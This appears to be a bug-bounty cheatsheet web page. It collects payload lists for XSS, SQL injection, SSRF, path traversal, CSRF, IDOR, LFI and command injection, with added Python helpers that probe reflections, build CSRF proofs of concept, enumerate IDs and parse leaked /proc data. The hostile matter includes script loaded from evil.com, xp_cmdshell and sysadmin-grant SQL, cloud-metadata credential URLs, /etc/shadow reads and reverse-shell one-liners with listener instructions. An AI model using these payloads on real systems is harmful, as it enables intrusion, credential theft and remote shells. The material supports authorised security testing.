Bug Bounty Cheatsheet

Quick reference guides for common vulnerabilities and techniques to assist you in your bug bounty journey.
XSS (Cross-Site Scripting)
Critical

Cross-Site Scripting (XSS) lets an attacker run script in a victim's browser under the vulnerable site's origin. Test the payloads below at every reflection point (HTML body, attribute values, JavaScript strings, URL-bearing attributes), and prefer alert(document.domain) over alert(1) so the popup proves which origin executed the script:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
javascript:alert(1)
'><script>alert(String.fromCharCode(88,83,83))</script>
<iframe src=javascript:alert(1)>
<marquee onstart=alert(1)>
<script src="http://evil.com/xss.js"></script>
<body onload=alert(1)>
<a href="javascript:alert(1)">Click me</a>
<div onmouseover=alert(1)>Hover over me</div>
<input type="text" value="<script>alert(1)</script>">
<link rel="stylesheet" href="javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<table background="javascript:alert(1)">
<textarea></textarea><script>alert(1)</script>
<!--#exec cmd="/bin/echo 'alert(1)'"-->
<!--#exec cmd="echo 'alert(1)'"-->
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<object data="javascript:alert(1)"></object>
<bgsound src="javascript:alert(1)">

The two <!--#exec ...--> entries are Server Side Include injection rather than XSS; they only fire where the server evaluates SSI directives. The javascript: URLs in <link rel="stylesheet">, <meta http-equiv="refresh">, <table background> and <bgsound> are legacy Internet Explorer and old-Firefox behaviour and do not execute in current Chrome or Firefox; <iframe src=javascript:>, <a href="javascript:">, srcdoc and the event-handler payloads still do. When a payload depends on a user action (onmouseover, "Click me"), state that interaction in the report.
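Before firing the list above, a practitioner first checks which special characters a parameter reflects unencoded, because that decides which payloads can work at all. The helper below is an added example in Python, not part of the original cheatsheet: it submits a canary containing the characters that matter, reads back which of them survive between the markers, and maps the result to payloads from the list (with alert(1) swapped for alert(document.domain)). The two render_* functions are constructed stand-ins for a server response, one that escapes and one that does not; the canary strings and the parameter name q are arbitrary.

```python
import html

# Markers around the probe make the reflection easy to locate in a large page;
# the strings themselves are arbitrary (constructed for this example).
CANARY_OPEN, CANARY_CLOSE = "zq7k", "k7qz"
# The characters that decide the context: attribute breakout needs a quote,
# tag injection needs angle brackets, a surviving slash matters for closing tags.
PROBE_CHARS = "\"'<>/"


def probe_value() -> str:
    """The value to submit in the parameter under test."""
    return CANARY_OPEN + PROBE_CHARS + CANARY_CLOSE


def surviving_chars(body: str) -> list[str]:
    """For every reflection of the probe in `body`, return the probe characters that
    came back literally. An entity-encoded form such as &lt; does not count."""
    found = []
    pos = 0
    while True:
        start = body.find(CANARY_OPEN, pos)
        if start < 0:
            break
        end = body.find(CANARY_CLOSE, start + len(CANARY_OPEN))
        if end < 0:
            break
        between = body[start + len(CANARY_OPEN):end]
        found.append("".join(c for c in PROBE_CHARS if c in between))
        pos = end + len(CANARY_CLOSE)
    return found


def payloads_for(survived: str) -> list[str]:
    """Map the surviving characters to payloads from the cheatsheet list."""
    tag_ok = "<" in survived and ">" in survived
    candidates = []
    if tag_ok:
        candidates.append("<svg onload=alert(document.domain)>")        # new tag in the HTML body
    if '"' in survived:
        candidates.append('"><svg onload=alert(document.domain)>' if tag_ok
                          else '" onmouseover=alert(document.domain) x="')  # stay inside the tag, add a handler
    if "'" in survived:
        candidates.append("'><svg onload=alert(document.domain)>" if tag_ok
                          else "' onmouseover=alert(document.domain) x='")
    return candidates


# Constructed stand-ins for the server response (against a target this is an HTTP fetch).
def render_unescaped(value: str) -> str:
    return f'<input name="q" value="{value}"><p>Results for {value}</p>'


def render_escaped(value: str) -> str:
    safe = html.escape(value, quote=True)  # & < > " ' become entities; / is left alone
    return f'<input name="q" value="{safe}"><p>Results for {safe}</p>'


def assess(render) -> dict:
    """Run the probe through a renderer and report, per reflection, what survived
    and which payloads that permits."""
    survived = surviving_chars(render(probe_value()))
    return {"reflections": survived, "payloads": [payloads_for(s) for s in survived]}


if __name__ == "__main__":
    for name, fn in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        print(name, assess(fn))
```

A literal quote that comes back preceded by a backslash means the value sits inside a JavaScript string with JS-escaping rather than HTML-escaping; the checker above does not distinguish that case, so inspect the raw response around the marker before choosing a payload.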
SQL Injection
High Impact

SQL Injection lets an attacker change the query an application builds from user input. The payloads below mix dialects: the -- comment works in MSSQL, PostgreSQL, Oracle and SQLite (MySQL needs a space after --, or #); WAITFOR DELAY and the EXEC/xp_/sp_ lines are MSSQL only; SLEEP() is MySQL. SELECT @@version is a fingerprint query to run once you have injection, not a payload by itself. Compare every response (status, length, timing) against a known-good baseline rather than looking for an error message alone:

' OR '1'='1
admin' --
' UNION SELECT username,password FROM users --
admin" or "1"="1
SELECT @@version
'; WAITFOR DELAY '0:0:5'--
" OR SLEEP(5) AND "1"="1
'; EXEC xp_cmdshell('whoami')--
' OR 'a'='a
' OR 'x'='x
' OR 1=1--
' OR 'x'='x' --
' OR 'x'='y
' OR ''='
' OR 1=1#
' OR 'test'='test
' OR 1=1;--
' OR 'x'='x';--
' OR 'a'='b
'; EXEC sp_addsrvrolemember 'sa', 'sysadmin'--
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE;--
'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--

The sp_configure changes only take effect after RECONFIGURE, and enabling xp_cmdshell needs the 'show advanced options' step first; both require sysadmin. sp_addsrvrolemember adds a login to a server role, so replace 'sa' (already sysadmin) with the login you control. Stacked queries (the '; ... forms) work in MSSQL and PostgreSQL; in MySQL they depend on the client driver.
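The first three payloads in action against a query built by string concatenation, beside the parameterised version that defeats them. This is an added example in Python over an in-memory SQLite database, not code from the cheatsheet; the users table, its two rows and the function names are constructed for the demonstration. SQLite honours the -- comment, so admin' -- behaves as it would on MSSQL or PostgreSQL.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: two users with plaintext passwords (demo only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, username: str, password: str) -> list[str]:
    """Query built by concatenation: a quote in the input closes the string literal and
    the rest of the input becomes SQL. Returns the usernames the query matched."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in conn.execute(sql).fetchall()]


def lookup_safe(conn, username: str, password: str) -> list[str]:
    """Parameterised query: values travel separately from the SQL text, so a quote in
    the input is only a character in the value."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password)).fetchall()]


def demo() -> dict:
    """Run three payloads from the list above through both lookups."""
    conn = make_db()
    payloads = {
        # password = '' OR '1'='1'  ->  AND binds tighter than OR, so every row matches
        "or_true_password": ("nobody", "' OR '1'='1"),
        # username = 'admin' --' AND password = ...  ->  the password check is commented out
        "comment_out_password": ("admin' --", "wrong"),
        # the second SELECT appends the password column to the result set
        "union_dump": ("' UNION SELECT password FROM users --", "x"),
    }
    return {
        name: {"vulnerable": lookup_vulnerable(conn, u, p), "safe": lookup_safe(conn, u, p)}
        for name, (u, p) in payloads.items()
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The time-based payloads from the list cannot be shown this way because SQLite has no SLEEP or WAITFOR; against a real target, measure the delay against a baseline request and repeat, since a single slow response proves nothing.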
SSRF (Server-Side Request Forgery)
Advanced

SSRF makes the server issue a request to a destination the attacker chooses, so it reaches loopback services, internal hosts and cloud metadata endpoints from the server's own network position. Test with these payloads, keeping in mind that what you are usually bypassing is a host filter rather than the target itself (IPv6 literals, alternative IP notations, userinfo and fragment tricks, and non-HTTP schemes such as file:// and dict://):

http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data
file:///etc/passwd
dict://127.0.0.1
http://[email protected]
http://127.0.0.1#evil.com
http://[::1]
http://[::]
http://localhost:80
http://localhost:8080
http://127.0.0.1:80
http://127.0.0.1:8080
http://127.0.0.1:22
http://127.0.0.1:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/RoleName
http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2InstanceRole
http://169.254.169.254/latest/meta-data/iam/security-credentials/S3AccessRole
http://127.0.0.1/admin

RoleName, EC2InstanceRole and S3AccessRole are placeholders: request the security-credentials/ listing first and substitute the role name it returns. Plain GETs against 169.254.169.254 only succeed on AWS instances that still allow IMDSv1; IMDSv2 requires a PUT to /latest/api/token with an X-aws-ec2-metadata-token-ttl-seconds header and then that token in X-aws-ec2-metadata-token on every request, which a GET-only SSRF cannot supply. The same address serves metadata on GCP (needs the Metadata-Flavor: Google header) and Azure (needs Metadata: true), so those also require an SSRF that lets you set request headers.
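The payload list is really a list of ways to defeat a host filter. The Python below, an added example rather than code from the cheatsheet, contrasts a substring blocklist with a check that parses the URL, normalises alternative IP notations and classifies the address; it shows why the [::1], [::], fragment and port variants above get past naive filters. The userinfo form http://trusted.example@127.0.0.1/ and the decimal and short forms 2130706433 and 127.1 are added here for illustration. Names that are not IP literals come back as undecided, because a real check must resolve them (and re-check after every redirect) instead of trusting the string.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def naive_blocked(url: str) -> bool:
    """The kind of filter the payload list above is built to beat."""
    return any(bad in url.lower() for bad in ("127.0.0.1", "localhost", "169.254.169.254"))


def parse_ip_literal(host: str):
    """Parse an IP literal, including the shorthand forms inet_aton accepts
    ('127.1', '2130706433', '0x7f.1') that the ipaddress module alone rejects."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))  # packed bytes -> address
    except OSError:
        return None


def is_internal(ip) -> bool:
    """Loopback, RFC 1918, link-local (cloud metadata), unspecified, reserved, multicast,
    and IPv4-mapped IPv6 forms of any of those (::ffff:127.0.0.1)."""
    if (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified
            or ip.is_reserved or ip.is_multicast):
        return True
    mapped = getattr(ip, "ipv4_mapped", None)
    return mapped is not None and is_internal(mapped)


def classify(url: str):
    """Return (internal, reason). internal is True/False for a decision and None when
    the host is a name that must be resolved before deciding."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return True, f"unparseable URL rejected: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return True, f"scheme {parts.scheme!r} not allowed"      # file://, dict://, gopher://
    host = parts.hostname   # userinfo, port, brackets and fragment are already stripped here
    if not host:
        return True, "no host"
    if host == "localhost" or host.endswith(".localhost"):
        return True, "localhost name"
    ip = parse_ip_literal(host)
    if ip is None:
        return None, f"{host!r} must be resolved, then every returned address re-checked"
    if is_internal(ip):
        return True, f"{host!r} is the internal address {ip}"
    return False, f"{ip} is public"


SAMPLE_URLS = [   # from the list above, plus constructed variants
    "http://127.0.0.1", "http://localhost:8080", "http://[::1]", "http://[::]",
    "http://127.0.0.1#evil.com", "http://169.254.169.254/latest/meta-data",
    "file:///etc/passwd", "dict://127.0.0.1",
    "http://trusted.example@127.0.0.1/", "http://2130706433/", "http://127.1/",
    "https://example.com/",
]


def compare(urls=SAMPLE_URLS) -> list:
    """Side by side: what the naive filter blocks versus what the parsing check decides."""
    return [(u, naive_blocked(u), classify(u)[0]) for u in urls]


if __name__ == "__main__":
    for url, naive, parsed in compare():
        print(f"{url:45} naive_blocked={naive!s:5} internal={parsed}")
```

Even the parsing check is only half a defence: a hostname that resolves to a public address at check time can resolve to 127.0.0.1 at fetch time (DNS rebinding), and a public host can 302 to the metadata address, so the check has to be applied to the socket actually being opened, for every hop.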
Directory Traversal
Common

Directory traversal (path traversal) escapes the directory an application means to serve from, by stacking ../ sequences or by encoding them so that a filter misses what the file system later sees. Vary the depth (the entries below use three to six levels; go to ten), try both / and \ against Windows targets, and request a file you know exists (/etc/passwd, C:\windows\win.ini) so that a hit is unambiguous:

../../etc/passwd
/../../../boot.ini
../../../../etc/hosts
..\..\..\windows\system.ini
../../../../../../etc/shadow
%2e%2e%2f
%252e%252e%252f
..;--[===
..%c0%af..%c0%af..%c0%af
..%c1%1c..%c1%1c..%c1%1c
..%c0%ae..%c0%ae..%c0%ae
..%c0%ae%c0%ae..%c0%ae%c0%ae
..%e0%80%af..%e0%80%af..%e0%80%af
..%e0%80%ae..%e0%80%ae..%e0%80%ae
..%c0%ae%c1%1c..%c0%ae%c1%1c
..%c0%ae%c1%9c..%c0%ae%c1%9c
..%c0%ae%c2%a0..%c0%ae%c2%a0
..%c0%ae%c2%ac..%c0%ae%c2%ac
..%c0%ae%c1%a0..%c0%ae%c1%a0
..%c0%ae%c2%a4..%c0%ae%c2%a4

%2e%2e%2f is a URL-encoded ../ and %252e%252e%252f its double-encoded form, which beats a filter that decodes only once. %c0%af, %e0%80%af and %c0%ae are overlong UTF-8 encodings of / and . (the IIS Unicode traversal bug), and %c1%1c and %c1%9c decode to \ under a lenient decoder; the remaining %c0%ae... entries pair that overlong dot with other two-byte sequences and are fuzzing mutations of the same idea. The only defence that survives all of these is to decode fully, canonicalise, and then compare the resulting path against the base directory, rather than searching the raw input for ../.
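Those encodings only matter because of how the server decodes before it checks. The Python below is an added example (not the cheatsheet's own code) that decodes the way a lenient server does, with repeated percent-decoding and a UTF-8 decoder that accepts overlong forms and bad continuation bytes, and shows why a check on the raw string is bypassed while a check on the canonical path is not. The base directory /var/www/files and the lenient-decoder behaviour are assumptions for the demonstration.

```python
import posixpath
from urllib.parse import unquote, unquote_to_bytes


def percent_decode_fully(path: str, max_rounds: int = 3) -> bytes:
    """Decode %xx repeatedly until the bytes stop changing, so %252e -> %2e -> '.'."""
    data = path.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def lenient_utf8_decode(data: bytes) -> str:
    """A decoder with the two classic weaknesses: it accepts overlong sequences
    (%c0%af -> '/') and never verifies continuation bytes (%c1%1c -> '\\').
    Assumed behaviour of an old IIS-style decoder; a strict decoder rejects both."""
    out = []
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif b & 0xE0 == 0xC0 and i + 1 < n:      # 2-byte lead (0xC0/0xC1 are overlong leads)
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))); i += 2
        elif b & 0xF0 == 0xE0 and i + 2 < n:      # 3-byte lead (%e0%80%af is an overlong '/')
            out.append(chr(((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F))); i += 3
        else:
            out.append("\ufffd"); i += 1
    return "".join(out)


def naive_blocks(user_path: str) -> bool:
    """The bypassable check: decode once, then look for a traversal substring."""
    decoded = unquote(user_path)
    return "../" in decoded or "..\\" in decoded


def safe_join(base: str, user_path: str):
    """Decode the way the server will, canonicalise, and only then compare against base.
    Returns the resolved path, or None when it escapes the base directory."""
    text = lenient_utf8_decode(percent_decode_fully(user_path))
    if "\x00" in text:
        return None                                # a null byte would truncate the path in C code
    text = text.replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(base, text.lstrip("/")))
    if candidate != base and not candidate.startswith(base.rstrip("/") + "/"):
        return None
    return candidate


if __name__ == "__main__":
    base = "/var/www/files"                        # assumed document root
    for p in ["reports/q1.pdf", "../../../../etc/passwd", "%2e%2e%2f%2e%2e%2fetc/passwd",
              "%252e%252e%252f%252e%252e%252fetc/passwd", "..%c0%af..%c0%af..%c0%afetc/passwd",
              "..%c1%1c..%c1%1cwindows/system.ini"]:
        print(f"{p:45} naive_blocks={naive_blocks(p)!s:5} safe_join={safe_join(base, p)}")
```

The naive check passes the double-encoded and overlong payloads because the single unquote() leaves them looking harmless, while the same bytes become ../ one decoding step later; safe_join rejects all of them because it compares the path after every transformation has run.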
CSRF (Cross-Site Request Forgery)
Impactful

CSRF makes the victim's browser send a state-changing request to the target, with the victim's cookies attached, from a page the attacker controls. The forms below need an auto-submit (<script>document.forms[0].submit()</script>) to fire without a click, and the <img> variants only work when a GET changes state. Before building one, confirm that the target has no per-request token and that its session cookie is actually sent cross-site: a cookie set without a SameSite attribute is treated as Lax by Chromium-based browsers, which withholds it on cross-site POSTs and on subresource loads such as <img> (Chromium temporarily exempts cookies set less than two minutes earlier from the POST restriction). Example payloads:

<form action="http://victim.com" method="POST">
<input type="hidden" name="amount" value="5000">
<input type="submit">
</form>
<img src="http://victim.com/logout"/>
<script>fetch('/delete?post=123', {method: 'DELETE'})</script>
(relative URL, so this only runs on the target's own origin, i.e. chained through an XSS; from a cross-site page a DELETE is preflighted and the browser only follows with the request, and with cookies only under credentials: 'include', if the target's CORS response allows the attacker's origin with credentials, which is a separate misconfiguration, so it is not a CSRF vector on its own)
<form action="http://example.com/transfer" method="POST">
<input type="hidden" name="account" value="attacker">
<input type="hidden" name="amount" value="1000">
<input type="submit">
</form>
<img src="http://example.com/delete-account"/>
<form action="http://example.com/update-email" method="POST">
<input type="hidden" name="new_email" value="[email protected]">
<input type="submit">
</form>
<img src="http://example.com/change-password?new_pass=123456"/>
<form action="http://example.com/add-friend" method="POST">
<input type="hidden" name="friend_id" value="attacker">
<input type="submit">
</form>
<form action="http://example.com/send-money" method="POST">
<input type="hidden" name="recipient" value="attacker">
<input type="hidden" name="amount" value="1000">
<input type="submit">
</form>
<img src="http://example.com/close-account"/>
<form action="http://example.com/update-profile" method="POST">
<input type="hidden" name="name" value="attacker">
<input type="submit">
</form>
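Before building one of the forms above, decide whether the request is even forgeable from a cross-site page: the browser's own rules (simple methods and content types only, no custom headers, SameSite cookies) settle most cases without a single request being sent. The Python below is an added example, not part of the cheatsheet: csrf_feasible encodes those rules and build_csrf_poc turns a captured request into an auto-submitting form. The captured requests, the host example.com and the SameSite values are constructed for the demonstration; the Chromium two-minute exemption for freshly set cookies is deliberately not modelled.

```python
import html

SIMPLE_METHODS = {"GET", "HEAD", "POST"}
# Bodies a plain <form> can produce; anything else (application/json) forces a CORS preflight.
SIMPLE_CONTENT_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}


def csrf_feasible(method: str, content_type: str = None, custom_headers=(),
                  cookie_samesite: str = None, top_level_navigation: bool = True):
    """Can a cross-site page make the victim's browser send this request with the session
    cookie attached? Returns (feasible, reason). cookie_samesite=None models a cookie set
    without the attribute, which Chromium-based browsers treat as Lax."""
    method = method.upper()
    if method not in SIMPLE_METHODS:
        return False, "non-simple method: the browser preflights it and a form cannot send it"
    if content_type and content_type.split(";")[0].strip().lower() not in SIMPLE_CONTENT_TYPES:
        return False, "non-form content type: needs a preflight, a form cannot produce it"
    if custom_headers:
        return False, "custom request headers (X-CSRF-Token, X-Requested-With) force a preflight"
    samesite = (cookie_samesite or "Lax").capitalize()
    if samesite == "Strict":
        return False, "SameSite=Strict cookie is never sent on cross-site requests"
    if samesite == "Lax" and not (method == "GET" and top_level_navigation):
        return False, "SameSite=Lax cookie is only sent on top-level GET navigations"
    return True, "simple request and the cookie travels with it"


def build_csrf_poc(action: str, params: dict, method: str = "POST") -> str:
    """Auto-submitting proof of concept for a simple request. Names and values are
    HTML-escaped so quotes in the captured parameters cannot break the PoC itself."""
    inputs = "\n".join(
        f'  <input type="hidden" name="{html.escape(k, quote=True)}" value="{html.escape(v, quote=True)}">'
        for k, v in params.items()
    )
    return (
        f'<form id="csrf" action="{html.escape(action, quote=True)}" method="{method.upper()}">\n'
        f"{inputs}\n</form>\n"
        "<script>document.getElementById('csrf').submit();</script>"
    )


# Constructed captured requests against a hypothetical target, example.com.
CAPTURED = {
    "transfer_form": dict(method="POST", content_type="application/x-www-form-urlencoded",
                          cookie_samesite="None"),
    "delete_api": dict(method="DELETE", cookie_samesite="None"),
    "json_api": dict(method="POST", content_type="application/json", cookie_samesite="None"),
    "lax_default_post": dict(method="POST", content_type="application/x-www-form-urlencoded"),
    "lax_default_img": dict(method="GET", top_level_navigation=False),
    "lax_default_link": dict(method="GET", top_level_navigation=True),
}


def triage() -> dict:
    """Decision and reason for every captured request."""
    return {name: csrf_feasible(**req) for name, req in CAPTURED.items()}


if __name__ == "__main__":
    for name, (ok, why) in triage().items():
        print(f"{name:18} {'FORGEABLE' if ok else 'blocked  '} {why}")
    print(build_csrf_poc("http://example.com/transfer", {"account": "attacker", "amount": "1000"}))
```

The json_api case is the one most often misreported: a JSON endpoint is only forgeable if it also accepts a form-encoded or text/plain body, which is worth testing explicitly before filing.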
IDOR (Insecure Direct Object References)
Common

IDOR is missing authorization on an object reference: the server trusts the identifier in the request instead of checking that the session owns the object. Test with two accounts you control: fetch an object as its owner to get a baseline, then replay the same request with the other account's session and compare status code, length and body. Try every method on the same path (a protected GET says nothing about the PATCH or DELETE), and apply the pattern to every identifier you see, whether numeric, UUID or base64-encoded, and whether it sits in the path, the body or a header:

GET /account/12345 HTTP/1.1
Change to:
GET /account/67890 HTTP/1.1

POST /api/v1/users/12345/update
Alter "12345" to target other users:
POST /api/v1/users/67890/update

GET /orders/12345 HTTP/1.1
Change to:
GET /orders/67890 HTTP/1.1

DELETE /api/v1/users/12345
Change to:
DELETE /api/v1/users/67890

PATCH /api/v1/users/12345
Change to:
PATCH /api/v1/users/67890

PUT /api/v1/users/12345
Change to:
PUT /api/v1/users/67890

POST /api/v1/orders/12345/cancel
Change to:
POST /api/v1/orders/67890/cancel

DELETE /api/v1/orders/12345
Change to:
DELETE /api/v1/orders/67890

GET /files/12345
Change to:
GET /files/67890

POST /api/v1/files/12345/delete
Change to:
POST /api/v1/files/67890/delete

PATCH /api/v1/files/12345
Change to:
PATCH /api/v1/files/67890

PUT /api/v1/files/12345
Change to:
PUT /api/v1/files/67890
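The replay-and-compare routine spelled out in Python, as an added example that is not part of the cheatsheet. The in-memory orders store, the two users alice and bob and the handler functions stand in for the target API; one handler has the ownership check the other lacks, and probe() is the differential test to run against each method in the list above. The choice to return 404 for both missing and foreign objects in the fixed handler is explained in its comment.

```python
# Constructed data: two accounts, each owning one order (stand-in for the target's database).
ORDERS = {
    12345: {"owner": "alice", "total": 99.0, "address": "1 Alice St"},
    67890: {"owner": "bob", "total": 250.0, "address": "2 Bob Ave"},
}


def get_order_vulnerable(session_user: str, order_id: int):
    """GET /orders/{id} with the IDOR: existence is checked, ownership is not."""
    order = ORDERS.get(order_id)
    if order is None:
        return 404, None
    return 200, order


def get_order_fixed(session_user: str, order_id: int):
    """Same endpoint with the authorisation check. Missing and foreign objects both
    return 404 so the endpoint does not double as an ID-existence oracle."""
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != session_user:
        return 404, None
    return 200, order


def cancel_order_vulnerable(session_user: str, order_id: int):
    """POST /orders/{id}/cancel: a state change with no ownership check."""
    order = ORDERS.get(order_id)
    if order is None:
        return 404, None
    order["cancelled"] = True
    return 200, {"cancelled": order_id}


def probe(handler, my_user: str, my_id: int, other_id: int) -> dict:
    """Differential test: the baseline request must succeed as the owner, then the same
    request for another account's object must not. A 200 on the cross-account request is
    the finding; a 403 versus 404 difference is a lesser one (an enumeration oracle)."""
    base_status, _ = handler(my_user, my_id)
    cross_status, cross_body = handler(my_user, other_id)
    return {
        "baseline_ok": base_status == 200,
        "cross_account_status": cross_status,
        "idor": cross_status == 200 and cross_body is not None,
        "leaked": cross_body,
    }


def enumerate_ids(handler, my_user: str, start: int, count: int) -> list:
    """Walk a range of sequential IDs and return those the session can read but does not own."""
    leaked = []
    for oid in range(start, start + count):
        status, body = handler(my_user, oid)
        if status == 200 and body.get("owner") != my_user:
            leaked.append(oid)
    return leaked


if __name__ == "__main__":
    for h in (get_order_vulnerable, get_order_fixed, cancel_order_vulnerable):
        print(h.__name__, probe(h, "alice", 12345, 67890))
    print("sequential scan:", enumerate_ids(get_order_vulnerable, "alice", 67880, 20))
```

Run the probe with a read-only handler first; against state-changing endpoints such as cancel, use objects created in your own second account so that the proof never touches another user's data.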
LFI (Local File Inclusion)
Common

Local File Inclusion is a traversal that ends in the server reading or executing the file (include(), template loaders, log viewers), so the payoff is source code, credentials in configuration files and process state from /proc. The entries below use four ../ levels; adjust the depth to the include path, and try an absolute path as well, since many loaders do not prepend a directory at all:

../../../../etc/passwd
../../../../etc/shadow
../../../../etc/hosts
../../../../etc/group
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../proc/self/status
../../../../proc/self/mounts
../../../../proc/self/smaps
../../../../proc/self/cgroup
../../../../proc/self/net/tcp
../../../../proc/self/net/tcp6
../../../../proc/self/net/udp
../../../../proc/self/net/udp6
../../../../proc/self/net/icmp
../../../../proc/self/net/arp
../../../../proc/self/net/route
../../../../proc/self/net/snmp
../../../../proc/self/net/wireless
../../../../proc/self/net/dev
/proc/self is the process serving your request, so environ (NUL-separated KEY=VALUE records) exposes the web server's or application's environment, where container deployments commonly put secrets, and cmdline gives the exact binary and arguments. The /proc/self/net/* files show the network namespace of that process: tcp and tcp6 list listening sockets and live connections in hex (little-endian address, big-endian port), arp and route map the internal network, dev and wireless are interface inventories. On PHP targets, php://filter/convert.base64-encode/resource=index.php returns source without executing it, and the %00 null-byte suffix trick only works on PHP versions before 5.3.4.
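Reading those /proc files is half the job; their formats still need decoding. The Python below is an added example, not the cheatsheet's code, that parses the three formats met most often: the NUL-separated environ and cmdline, and the hex socket table in /proc/self/net/tcp. The sample contents are constructed to look like what a web worker would return; the DB_PASSWORD variable, the gunicorn command line and the socket rows are invented for the demonstration.

```python
# Constructed samples of what an LFI against /proc/self/* might return.
SAMPLE_ENVIRON = (b"PATH=/usr/local/sbin:/usr/bin\x00HOSTNAME=web-7c9d\x00"
                  b"DB_PASSWORD=hunter2\x00APP_ENV=production\x00")
SAMPLE_CMDLINE = b"/usr/local/bin/gunicorn\x00--bind\x000.0.0.0:8000\x00app:application\x00"
SAMPLE_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 18123 1 0000000000000000 100 0 0 10 0\n"
    "   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12001 1 0000000000000000 100 0 0 10 0\n"
    "   2: 0B01000A:C8F2 2801000A:1538 01 00000000:00000000 00:00000000 00000000    33        0 19877 1 0000000000000000 20 4 30 10 -1\n"
)

TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
              "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
              "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING"}


def parse_environ(data: bytes) -> dict:
    """/proc/<pid>/environ: KEY=VALUE records separated by NUL bytes."""
    env = {}
    for record in data.split(b"\x00"):
        if b"=" in record:
            key, _, value = record.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def parse_cmdline(data: bytes) -> list:
    """/proc/<pid>/cmdline: argv joined by NUL bytes, with a trailing NUL."""
    return [arg.decode(errors="replace") for arg in data.split(b"\x00") if arg]


def decode_hex_addr(field: str):
    """'0100007F:0050' -> ('127.0.0.1', 80). The address is a little-endian 32-bit hex
    value on x86 kernels, so the octets are read back to front; the port is plain hex."""
    ip_hex, port_hex = field.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0)]
    return ".".join(octets), int(port_hex, 16)


def parse_net_tcp(text: str) -> list:
    """/proc/net/tcp rows -> dicts with decoded endpoints, state and owning uid."""
    rows = []
    for line in text.splitlines()[1:]:           # first line is the column header
        fields = line.split()
        if len(fields) < 8:
            continue
        local_ip, local_port = decode_hex_addr(fields[1])
        remote_ip, remote_port = decode_hex_addr(fields[2])
        rows.append({
            "local": f"{local_ip}:{local_port}",
            "remote": f"{remote_ip}:{remote_port}",
            "state": TCP_STATES.get(fields[3], fields[3]),
            "uid": int(fields[7]),
        })
    return rows


def secrets_from_environ(env: dict) -> dict:
    """Variables worth reporting first; the name heuristic is an assumption."""
    markers = ("PASS", "SECRET", "TOKEN", "KEY")
    return {k: v for k, v in env.items() if any(m in k.upper() for m in markers)}


if __name__ == "__main__":
    print(parse_cmdline(SAMPLE_CMDLINE))
    print(secrets_from_environ(parse_environ(SAMPLE_ENVIRON)))
    for row in parse_net_tcp(SAMPLE_NET_TCP):
        print(row)
```

In the constructed table the row with a LISTEN socket on 127.0.0.1:3306 and the ESTABLISHED connection to 10.0.1.40:5432 are exactly the kind of detail that turns an LFI report into an SSRF or pivot target list.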
RCE (Remote Code Execution)
High Impact

Remote Code Execution here means OS command injection: the input lands inside a shell command line, so a separator ends the intended command and starts yours. The leading ; in each payload is one separator; also try |, &&, ||, a newline (%0a), and $(...) or backticks inside an argument. The reverse shells below use 127.0.0.1:1234 as a placeholder: replace it with the address and port of your listener (nc -lvnp 1234) and, on a target that cannot reach you, fall back to a blind proof such as a sleep or a DNS lookup to a host you control:

; nc -e /bin/sh 127.0.0.1 1234
; bash -i >& /dev/tcp/127.0.0.1/1234 0>&1
; php -r '$sock=fsockopen("127.0.0.1",1234); exec("/bin/sh -i <&3 >&3 2>&3");'
; python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("127.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
